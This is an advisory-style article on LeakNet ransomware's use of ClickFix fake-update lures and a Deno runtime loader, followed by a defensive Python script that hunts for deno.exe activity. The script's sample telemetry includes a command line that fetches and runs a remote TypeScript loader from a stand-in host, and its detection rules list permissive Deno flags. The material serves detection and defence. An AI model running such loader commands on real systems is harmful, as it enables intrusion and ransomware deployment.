Medium Vulnerability

LeakNet Ransomware Uses ClickFix via Hacked Sites

The LeakNet ransomware gang is now using the ClickFix technique for initial access into corporate environments and deploys a malware loader based on the open-source Deno runtime for JavaScript and Typ

What Happened

The LeakNet ransomware operation has evolved its tactics, incorporating the “ClickFix” social engineering technique for initial access and deploying a novel malware loader based on the Deno runtime. According to security reports, attackers are compromising legitimate websites to host malicious advertisements or pop-ups. These elements trick users into believing a critical software update, like a browser or plugin fix, is required. When clicked, the action downloads a malicious installer, granting the threat actors an initial foothold inside corporate networks. Following access, the attackers deploy a loader that leverages the open-source Deno runtime to execute JavaScript and TypeScript payloads directly in memory.

Why It Matters

This development is significant for two primary reasons. First, the use of ClickFix exploits human trust in common software update prompts, making it a highly effective social engineering vector that can bypass technical controls. Second, the adoption of the Deno runtime for a loader represents a notable shift in the malware landscape. Deno is less commonly monitored for malicious use compared to traditional frameworks like Node.js or PowerShell, allowing the loader to operate with greater stealth and evade signature-based detection. This combination increases the likelihood of successful initial compromise and subsequent payload execution.

Technical Details

The attack chain begins with a compromised website serving a fraudulent “ClickFix” or “Update” prompt. The downloaded installer is typically a disguised executable that establishes initial access. The key technical innovation is the subsequent loader. By utilizing the Deno runtime, the malware can fetch and execute additional payloads, likely the ransomware itself, directly in system memory (a fileless technique). This in-memory execution leaves minimal forensic traces on disk. The loader’s use of a legitimate, signed runtime binary (deno.exe) further aids in evading application allow-listing and behavioral analysis tools that may not flag Deno’s network activity as suspicious.

Immediate Risk

The immediate risk is MEDIUM. While not exploiting a specific software vulnerability, the campaign’s social engineering component poses a broad threat to any organization whose employees browse the web. The attack vector is not targeted; any user visiting a compromised site could be hit. The primary risk is initial access leading to a full ransomware deployment, resulting in data encryption, exfiltration, and potential operational disruption. Organizations without robust web filtering, endpoint detection for in-memory attacks, and security awareness training are at elevated risk.

Security Insight

This campaign underscores the need for a layered defense that addresses both human and technical factors. Security teams should reinforce user training to recognize social engineering lures, specifically warning against unsolicited update prompts from websites. Technically, monitoring for unusual network connections originating from legitimate but uncommon processes like deno.exe is crucial. Implementing application allow-listing that strictly controls which scripts and runtimes can execute, alongside behavioral detection for in-memory payloads, can effectively counter this loader technique. Proactive hunting for Deno runtime execution in non-development environments is now a prudent defensive measure.
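The hunting guidance above (Deno execution on non-development hosts, and network connections from deno.exe) can be turned into a small triage script. The following is an added example written for this page, not code from the article or from any vendor; the event records are constructed to resemble Sysmon process-creation (Event ID 1) and network-connection (Event ID 3) telemetry, the field names and the DEV_HOSTS inventory are assumptions, and the hostnames, paths and destinations are invented sample data. The `-A`, `--allow-all`, `--allow-net` and `--allow-run` flags and `deno run <URL>` remote-module execution are real Deno features and are what make a runtime-based loader worth watching for.

```python
"""Hunt for Deno runtime activity outside development hosts.

Added example, not from the original article. Events are constructed to
resemble Sysmon process-creation (ID 1) and network-connection (ID 3)
records; the field names are an assumption, not a vendor schema.
"""
import re
from dataclasses import dataclass

# Assumed inventory: hosts where the Deno runtime is legitimately expected.
DEV_HOSTS = {"dev-ws-01", "dev-ws-02"}

# Real Deno permission flags that grant broad network/process access.
PERMISSIVE_FLAGS = {"-A", "--allow-all", "--allow-net", "--allow-run"}

# `deno run` accepts a remote module URL; a loader that fetches its payload
# from the network would typically show this in the command line.
REMOTE_MODULE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def is_deno(image: str) -> bool:
    """True when the process image is deno.exe, regardless of its path."""
    return image.lower().replace("\\", "/").split("/")[-1] == "deno.exe"


def hunt(events: list[dict], dev_hosts: set[str] = DEV_HOSTS) -> list[Finding]:
    """Apply the four hunting rules to a batch of events and return findings."""
    findings: list[Finding] = []
    for ev in events:
        if not is_deno(ev.get("Image", "")):
            continue
        host = ev["Host"]
        if ev["EventID"] == 1:
            cmd = ev.get("CommandLine", "")
            if host not in dev_hosts:
                findings.append(Finding(host, "deno-outside-dev", cmd))
            if REMOTE_MODULE.search(cmd):
                findings.append(Finding(host, "deno-remote-module", cmd))
            if PERMISSIVE_FLAGS.intersection(cmd.split()):
                findings.append(Finding(host, "deno-permissive-flags", cmd))
        elif ev["EventID"] == 3 and host not in dev_hosts:
            dest = f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'
            findings.append(Finding(host, "deno-network-outside-dev", dest))
    return findings


# Constructed sample telemetry: one benign developer run, then deno.exe
# appearing on a finance workstation with a remote module and blanket
# permissions, followed by an outbound connection from that process.
SAMPLE_EVENTS = [
    {"EventID": 1, "Host": "dev-ws-01",
     "Image": r"C:\Users\alice\.deno\bin\deno.exe",
     "CommandLine": "deno.exe test --allow-read src/"},
    {"EventID": 1, "Host": "fin-ws-07",
     "Image": r"C:\Users\Public\deno.exe",
     "CommandLine": "deno.exe run -A https://update-check.invalid/loader.ts"},
    {"EventID": 3, "Host": "fin-ws-07",
     "Image": r"C:\Users\Public\deno.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "Host": "fin-ws-07",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The developer run produces no findings, while the finance workstation yields four: execution outside the developer inventory, a remote module URL, a blanket `-A` permission, and an outbound connection from deno.exe. In a real deployment the DEV_HOSTS set would come from asset inventory, and the network rule would normally be narrowed with an allowlist of known registries and internal destinations to keep the signal usable.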
